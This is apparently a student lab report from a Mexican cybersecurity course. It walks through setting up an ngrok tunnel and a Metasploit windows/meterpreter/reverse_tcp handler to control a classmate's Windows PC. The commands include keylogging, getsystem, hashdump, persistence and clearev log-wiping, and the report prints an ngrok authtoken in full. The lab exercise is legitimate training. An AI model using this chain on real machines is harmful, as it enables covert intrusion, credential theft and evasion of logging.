Universidad Tecnológica de León Ingeniería en Redes Inteligentes y Ciberseguridad
Asignatura: Automatización de Infraestructura Digital II
Profesor: Juan Carlos Almonaci Puga
Título del trabajo: Kali-VPN
Presenta: Porras Noriega Fátima Abigail
Matrícula: 18002125
Grupo: IRIC 1001
León, Guanajuato. A 12 de octubre de 2021
Los pasos que se llevaron a cabo en la práctica realizada fueron los siguientes: Para la primera parte de la creación de la VPN inició sesión en Ngrok, desde el sitio https://ngrok.com y al iniciar sesión nos dirigimos a la sección Your Authtoken.
En esta sección, fue necesario guardar el authtoken que nos dieron ya que posteriormente serviría para iniciar el servicio de Ngrok en Linux, este fue ./ngrok authtoken 1zQnXPRJBplBkY4REZctPX7mWTa_3Mb4jBfV9z63h6jW5zfGa. Posterior a esto, se descargó Ngrok en nuestra máquina Kali:
Ya en Kali ingresamos a la carpeta de descargas (cd Downloads/) y se descomprimió el archivo de Ngrok previamente descargado con el comando unzip ngrok-stable-linuxamd64.zip.
El
siguiente
comando
que
se
ejecutó
fue
el
de
./ngrok
authtoken
1zQnXPRJBplBkY4REZctPX7mWTa_3Mb4jBfV9z63h6jW5zfGa para que el archivo del authtoken se guardara en la máquina.
Posteriormente se ejecutó el comando ./ngrok tcp 443 con la intención de iniciar una sesión de Ngrok y poder observar que estuviera activa la sesión.
En el comando ejecutado anteriormente es importante tener en cuenta el campo forwarding ya que los datos 8.tcp.ngrok.io y 15047 serán el LHOST y LPORT respectivamente más adelante.
El siguiente paso fue comprimir a zip el payload que se creó y moverlo a la carpeta del servidor web de Ngrok de modo que la otra persona, desde su equipo, pudiera de manera remota ingresar a la dirección IP de nuestra máquina seguido del nombre del archivo, en este caso Davidpayload.zip:
Importante tomar en cuenta que antes de ejecutar el payload en el otro pc, se debe ejecuta el comando msfconsole:
Dentro de la Aplicación Metasploit ejecutar el comando use exploit/multi/handler:
Volver a ejecutar el comando set payload windows/meterpreter/reverse_tcp y usando el método PAYLOAD configurar la IP local y el puerto a utilizar con los comandos set LHOST (IP_LOCAL), set LPORT (puerto):
Aquí el otro usuario, de la otra máquina se supone que ya debería haber ejecutado el payload en su máquina, por lo que se debió ejecutar el comando exploit para comenzar a ver toda la actividad de manera remota:
Regresar a KALI y ejecutar en metasploit el comando sessions 1 -i:
Algunas de las opciones que se utilizaron en la máquina del compañero en metasploit fueron las siguientes: •
sysinfo:
•
getsystem:
•
ipconfig:
•
screenshot:
Como se puede visualizar en la siguiente imagen, es la captura de pantalla guardada.
•
keyscan_start: Inicia keylogger y deja una captura de todo lo capturado en el teclado de la computadora:
La siguiente captura de pantalla muestra un ejemplo de texto escrito en una nota de Windows, en ella se escribió el mensaje “Hola, me llamo Abigail Porras”. Lo cual servirá en el siguiente comando para el keylogger.
•
keyscan_dump:
•
keyscan_stop:
•
run persistence -X:
•
hashdump:
•
execute:
Y en Windows se abre la calculadora:
•
clearev: